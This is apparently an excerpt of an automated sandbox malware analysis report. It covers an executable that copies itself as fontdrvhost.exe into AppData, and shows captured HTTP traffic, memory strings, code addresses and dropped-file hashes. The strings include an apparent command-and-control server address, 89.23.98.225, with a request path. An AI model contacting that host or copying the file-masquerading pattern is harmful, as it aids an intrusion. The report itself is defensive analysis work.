Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:03 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:30 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:43 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:38:55 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: fontdrvhost.exe, 00000008.00000002.1704980568.0000000003102000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1796124572.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.1883168171.0000000003347000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1932041291.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000002.2017458339.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2120982731.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2116613612.0000000003855000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2490608916.000000000363C000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.98.225
                        Source: fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generato
                        Source: ZT3pxe2Tb4.exe, 00000000.00000002.1647722543.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000008.00000002.1704980568.0000000003102000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1796124572.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.1883168171.0000000003347000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1932041291.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000002.2017458339.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2120982731.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2116613612.0000000003855000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2490608916.000000000363C000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BA10DA80_2_00007FFD9BA10DA8
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD74440_2_00007FFD9BBD7444
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD73840_2_00007FFD9BBD7384
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD5A000_2_00007FFD9BBD5A00
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBC09BE0_2_00007FFD9BBC09BE
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD61790_2_00007FFD9BBD6179
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD49780_2_00007FFD9BBD4978
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBC000A0_2_00007FFD9BBC000A
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD4F510_2_00007FFD9BBD4F51
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD36000_2_00007FFD9BBD3600
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD761C0_2_00007FFD9BBD761C
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD55D40_2_00007FFD9BBD55D4
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD4D310_2_00007FFD9BBD4D31
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD4D120_2_00007FFD9BBD4D12
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD4CA10_2_00007FFD9BBD4CA1
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD6C800_2_00007FFD9BBD6C80
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9C0F78B00_2_00007FFD9C0F78B0
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9B9F0DA88_2_00007FFD9B9F0DA8
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9BBB4BF28_2_00007FFD9BBB4BF2
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9BBB5A008_2_00007FFD9BBB5A00
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9BBA09BE8_2_00007FFD9BBA09BE
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9BBB49788_2_00007FFD9BBB4978
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9BBA000A8_2_00007FFD9BBA000A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9BBB5E828_2_00007FFD9BBB5E82
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9BBB36008_2_00007FFD9BBB3600
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9BBB55D38_2_00007FFD9BBB55D3
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9BBB65908_2_00007FFD9BBB6590
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9BBB34F38_2_00007FFD9BBB34F3
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9BBB4CF28_2_00007FFD9BBB4CF2
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9BBB6C808_2_00007FFD9BBB6C80
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 9_2_00007FFD9BA2B7ED9_2_00007FFD9BA2B7ED
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 9_2_00007FFD9BA10DA89_2_00007FFD9BA10DA8
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 9_2_00007FFD9BA1F5629_2_00007FFD9BA1F562
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 9_2_00007FFD9BA69EB89_2_00007FFD9BA69EB8
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 9_2_00007FFD9BA2D3449_2_00007FFD9BA2D344
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 14_2_00007FFD9BA20DA814_2_00007FFD9BA20DA8
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 14_2_00007FFD9BBD09BE14_2_00007FFD9BBD09BE
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 14_2_00007FFD9BBD000A14_2_00007FFD9BBD000A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 14_2_00007FFD9BBE360014_2_00007FFD9BBE3600
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 14_2_00007FFD9C1078B014_2_00007FFD9C1078B0
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BA0B7ED21_2_00007FFD9BA0B7ED
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9B9F0DA821_2_00007FFD9B9F0DA8
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9B9FF56221_2_00007FFD9B9FF562
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BA49EB821_2_00007FFD9BA49EB8
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BBA09BE21_2_00007FFD9BBA09BE
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BBB497821_2_00007FFD9BBB4978
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BBA000A21_2_00007FFD9BBA000A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BBB360021_2_00007FFD9BBB3600
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BBB34F321_2_00007FFD9BBB34F3
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BBC2C2421_2_00007FFD9BBC2C24
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BBC13D821_2_00007FFD9BBC13D8
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BBC16F221_2_00007FFD9BBC16F2
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BBC82C821_2_00007FFD9BBC82C8
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9C0FE8A121_2_00007FFD9C0FE8A1
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9C0DB66F21_2_00007FFD9C0DB66F
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9C10B9CA21_2_00007FFD9C10B9CA
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9C10CE2221_2_00007FFD9C10CE22
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9C10B24D21_2_00007FFD9C10B24D
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BA0D34421_2_00007FFD9BA0D344
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9BA00DA827_2_00007FFD9BA00DA8
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9BBC5A0027_2_00007FFD9BBC5A00
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9BBB09BE27_2_00007FFD9BBB09BE
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9BBC497827_2_00007FFD9BBC4978
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9BBB000A27_2_00007FFD9BBB000A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9BBC4F4F27_2_00007FFD9BBC4F4F
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9BBC360027_2_00007FFD9BBC3600
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9BBC55D427_2_00007FFD9BBC55D4
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9BBC4D2F27_2_00007FFD9BBC4D2F
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9BBC34F327_2_00007FFD9BBC34F3
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9BBC4D0F27_2_00007FFD9BBC4D0F
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9BBC4C9F27_2_00007FFD9BBC4C9F
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9BBC6C8027_2_00007FFD9BBC6C80
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9C0E78B027_2_00007FFD9C0E78B0
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9C0E351827_2_00007FFD9C0E3518
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 34_2_00007FFD9B9E0DA834_2_00007FFD9B9E0DA8
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 34_2_00007FFD9BBA4BF234_2_00007FFD9BBA4BF2
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 34_2_00007FFD9BBA5A0034_2_00007FFD9BBA5A00
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 34_2_00007FFD9BB909BE34_2_00007FFD9BB909BE
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 34_2_00007FFD9BBA497834_2_00007FFD9BBA4978
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 34_2_00007FFD9BBA5E8234_2_00007FFD9BBA5E82
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 34_2_00007FFD9BBA360034_2_00007FFD9BBA3600
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 34_2_00007FFD9BBA55D334_2_00007FFD9BBA55D3
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 34_2_00007FFD9BBA4CF234_2_00007FFD9BBA4CF2
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 34_2_00007FFD9BBA34F334_2_00007FFD9BBA34F3
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 34_2_00007FFD9C0C78B034_2_00007FFD9C0C78B0
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BA2B7ED35_2_00007FFD9BA2B7ED
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BA1F56235_2_00007FFD9BA1F562
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BA10DA835_2_00007FFD9BA10DA8
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BA69EB835_2_00007FFD9BA69EB8
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BBC09BE35_2_00007FFD9BBC09BE
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BBD497835_2_00007FFD9BBD4978
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BBC000A35_2_00007FFD9BBC000A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BBD360035_2_00007FFD9BBD3600
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BBD4D3135_2_00007FFD9BBD4D31
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BBD4D1235_2_00007FFD9BBD4D12
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BBD4CA135_2_00007FFD9BBD4CA1
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BBE23E035_2_00007FFD9BBE23E0
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BBE13D835_2_00007FFD9BBE13D8
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BBE23CF35_2_00007FFD9BBE23CF
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BBE82E135_2_00007FFD9BBE82E1
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BBE16F235_2_00007FFD9BBE16F2
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9C0F78B035_2_00007FFD9C0F78B0
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9C0FB66F35_2_00007FFD9C0FB66F
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9C12B9CA35_2_00007FFD9C12B9CA
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9C12CE2235_2_00007FFD9C12CE22
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9C12B24D35_2_00007FFD9C12B24D
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9C11E8A135_2_00007FFD9C11E8A1
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BA2D34435_2_00007FFD9BA2D344
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AFOsBjYP.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AaPSReOe.log F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                        Source: DnshUSLJ.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: tAOrkGQb.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
